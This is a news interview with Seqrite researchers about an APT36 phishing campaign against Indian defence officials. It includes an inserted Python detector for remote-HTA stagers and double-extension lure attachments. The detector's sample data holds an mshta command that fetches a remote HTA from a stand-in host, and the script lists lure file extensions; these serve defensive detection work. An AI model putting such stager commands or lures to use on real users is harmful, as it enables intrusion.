A Pakistan-based hacker group is reportedly behind cyberattacks targeting officials of the Indian defence forces. The attacks are a coordinated attempt to steal critical-infrastructure and strategic data by means of phishing emails. According to cyber security researchers at Seqrite, the cyber security solutions arm of Quick Heal, the hackers based in Pakistan may be backed by China to gather intelligence against India. The Sunday Guardian spoke to Himanshu Dubey, Director, Quick Heal Security Labs, and Sanjay Katkar, Joint Managing Director and Chief Technology Officer, on these recent attacks. Excerpts:

Q: How and when did Seqrite discover this cyber operation?

A: A couple of months ago, Seqrite’s next-generation behavioural detection technology alerted on a few processes running executable HTA files on non-reputed websites. Besides, the researchers noticed that attachments had interesting names such as “Defence Production Policy 2020.docx.lnk”.

These factors alerted us to go for an advanced investigation phase. Upon probing further, Seqrite researchers found that these attacks were targeted at Indian defence units and armed forces’ individuals.
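The two indicators named in this answer, a process launching an HTA file from a remote host and an attachment whose name hides an executable extension behind a document extension, can be checked mechanically. The following is an added example, not Seqrite's detection technology or any code from the campaign: it runs two simple checks over a handful of constructed process-creation and mail-attachment events. The event field names (`image`, `cmdline`, `attachments`) and the hostnames are assumptions made for the example.

```python
"""Flag two lure patterns from the interview over constructed sample events.

Added example (not Seqrite's code). Field names and hosts are assumptions.
"""
import re
from typing import List, Optional, Tuple

# Extensions a victim expects to see on a document, and extensions that
# actually execute when double-clicked on Windows.
DOCUMENT_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
EXECUTABLE_EXTS = {"lnk", "hta", "exe", "scr", "js", "vbs", "cmd", "bat"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def is_double_extension_lure(filename: str) -> bool:
    """True for names like 'Report.docx.lnk': a document-looking name whose
    real (last) extension is one Windows will execute."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DOCUMENT_EXTS and parts[2] in EXECUTABLE_EXTS


def mshta_remote_hta(event: dict) -> Optional[str]:
    """If the event is mshta.exe started with a remote URL on its command
    line, return the host it fetches from; otherwise None."""
    image = event.get("image", "").lower().replace("/", "\\")
    if image.rsplit("\\", 1)[-1] != "mshta.exe":
        return None
    match = URL_RE.search(event.get("cmdline", ""))
    if not match:
        return None
    # urlsplit is avoided so a malformed URL cannot raise; take the host part.
    rest = match.group(0).split("://", 1)[1]
    return rest.split("/", 1)[0].split("@")[-1].split(":")[0].lower()


def triage(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (event id, reason) for every event matching either indicator."""
    findings: List[Tuple[int, str]] = []
    for event in events:
        host = mshta_remote_hta(event)
        if host:
            findings.append((event["id"], f"mshta.exe fetched a remote HTA from {host}"))
        for attachment in event.get("attachments", []):
            if is_double_extension_lure(attachment):
                findings.append((event["id"], f"double-extension lure attachment {attachment!r}"))
    return findings


# Constructed sample telemetry (assumed schema; hostnames use the reserved
# .invalid TLD so nothing here resolves).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://stager.example.invalid/load.hta'},
    {"id": 2, "image": r"C:\Program Files\Mail\mail.exe",
     "attachments": ["Defence Production Policy 2020.docx.lnk"]},
    {"id": 3, "image": r"C:\Program Files\Office\WINWORD.EXE",
     "attachments": ["Defence Production Policy 2020.docx"]},
    {"id": 4, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe C:\Users\user\AppData\Local\Temp\help.hta'},
]

if __name__ == "__main__":
    for event_id, reason in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Event 4 (a local HTA) is deliberately not flagged: mshta.exe running a file on disk is common in legitimate software, so the remote-URL check is what separates the stager pattern described above from noise. Event 3 shows the same lure name without the trailing `.lnk`, which is exactly what the victim is meant to see.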

Q: Has Seqrite been able to identify the extent of the number of victims affected in this operation?

A: So far, we have successfully detected and blocked these attacks on over 200 systems where Seqrite is present across India. The attacks are gradually increasing.

Q: Where did this attack originate from? And what is the proof to substantiate the origin?

A: Based on the evidence captured in the attribution section of the whitepaper, the attack is likely being carried out by a sub-group of the notorious cyberattack group APT36, aka Transparent Tribe, which is suspected to be based out of Pakistan. For attribution, we considered several factors, some of which are: the infrastructure used for Command & Control servers; registered domain naming patterns and recently created domains; command and control server names that are similar to the names used by APT36 in the past. One domain that hosted HTA stagers was registered to a user in Rawalpindi, PK. APT36 has a history of APT attacks on Indian defence organisations.

Q: Would you agree that using titillating images and file names is one of the most common baits used to target intended victims?

A: Yes. In targeted campaigns, these social engineering techniques are highly prevalent.

Q: You have mentioned that China was also involved in this operation. Can you elaborate on this?

A: We are not sure about China’s involvement. Taking the ongoing conflict and the targeted organisations into account, we are considering the possibility that China might have influenced this attack.

Q: This is not the first time that such an attack, originating from the other side of the border, has taken place. What makes India so vulnerable to such attacks? Are companies and government bodies not spending enough to secure their networks?

A: Cyberattacks against Indian organisations originating from neighbouring countries are not unique. In fact, advanced cyberattacks, potentially backed by nation-states, are no longer a novelty; almost all countries across the globe are facing this threat. In current times, securing infrastructure and data requires continuous evolution and a robust cybersecurity strategy, not just in India, but on a global level. Our observation has been that cyberattack and cybersecurity awareness among end users is lower in India compared to developed countries.